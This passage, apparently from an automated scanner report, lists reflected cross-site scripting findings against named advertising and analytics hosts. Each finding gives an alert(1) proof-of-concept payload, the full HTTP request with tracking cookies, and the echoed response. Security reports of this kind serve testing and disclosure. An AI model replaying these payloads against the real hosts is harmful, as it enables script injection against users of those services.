The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 91e12<script>alert(1)</script>06f94ed23a0 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction91e12<script>alert(1)</script>06f94ed23a0&n=ar_int_p84552060&1309224228403 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224211; ar_p84552060=exp=4&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:31 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1309224217%2E202%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:56 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction91e12<script>alert(1)</script>06f94ed23a0("");

1.147. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 42c13<script>alert(1)</script>3825194920e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=242c13<script>alert(1)</script>3825194920e&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:17 GMT
Date: Tue, 28 Jun 2011 01:23:17 GMT
Content-Length: 1334
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"242c13<script>alert(1)</script>3825194920e", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.148. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 4f23c<script>alert(1)</script>c64b0bb20a1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=5&c4=http%3A%2F%2Fwww.businessinsider.com%2F&c5=&c6=&c10=4f23c<script>alert(1)</script>c64b0bb20a1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:34 GMT
Date: Tue, 28 Jun 2011 01:23:34 GMT
Content-Length: 1266
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
OMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"5", c4:"http://www.businessinsider.com/", c5:"", c6:"", c10:"4f23c<script>alert(1)</script>c64b0bb20a1", c15:"", c16:"", r:""});



1.149. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6e0d9<script>alert(1)</script>55521066ad0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15=6e0d9<script>alert(1)</script>55521066ad0 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:30 GMT
Date: Tue, 28 Jun 2011 01:23:30 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
SCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"6e0d9<script>alert(1)</script>55521066ad0", c16:"", r:""});



1.150. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 4cdef<script>alert(1)</script>6c54afd2076 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=72903804cdef<script>alert(1)</script>6c54afd2076&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:18 GMT
Date: Tue, 28 Jun 2011 01:23:18 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"72903804cdef<script>alert(1)</script>6c54afd2076", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.151. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2a6bf<script>alert(1)</script>41b54ddb732 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=2a6bf<script>alert(1)</script>41b54ddb732&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:19 GMT
Date: Tue, 28 Jun 2011 01:23:19 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"2a6bf<script>alert(1)</script>41b54ddb732", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.152. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f0bfd<script>alert(1)</script>66b34a2d166 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-marketf0bfd<script>alert(1)</script>66b34a2d166&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:20 GMT
Date: Tue, 28 Jun 2011 01:23:20 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
h(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-marketf0bfd<script>alert(1)</script>66b34a2d166", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.153. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8b9f7<script>alert(1)</script>a14dba9a415 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=8b9f7<script>alert(1)</script>a14dba9a415&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:28 GMT
Date: Tue, 28 Jun 2011 01:23:28 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
eturn c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"8b9f7<script>alert(1)</script>a14dba9a415", c6:"", c10:"", c15:"", c16:"", r:""});



1.154. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 32dd7<script>alert(1)</script>2aad8813a78 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=32dd7<script>alert(1)</script>2aad8813a78&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:29 GMT
Date: Tue, 28 Jun 2011 01:23:29 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"32dd7<script>alert(1)</script>2aad8813a78", c10:"", c15:"", c16:"", r:""});



1.155. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37bf9'-alert(1)-'8e97064860d was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager37bf9'-alert(1)-'8e97064860d&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
equest and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager37bf9'-alert(1)-'8e97064860d&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
va
...[SNIP]...

1.156. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the Page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b7a2'-alert(1)-'0f7f7c6816f was submitted in the Page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting8b7a2'-alert(1)-'0f7f7c6816f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting8b7a2'-alert(1)-'0f7f7c6816f';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.157. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d21"><script>alert(1)</script>0dcec04e695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisc8d21"><script>alert(1)</script>0dcec04e695/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisc8d21"><script>alert(1)</script>0dcec04e695/340321756/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.158. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27c01"><script>alert(1)</script>4430bdc2267 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1028646844@x5427c01"><script>alert(1)</script>4430bdc2267?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
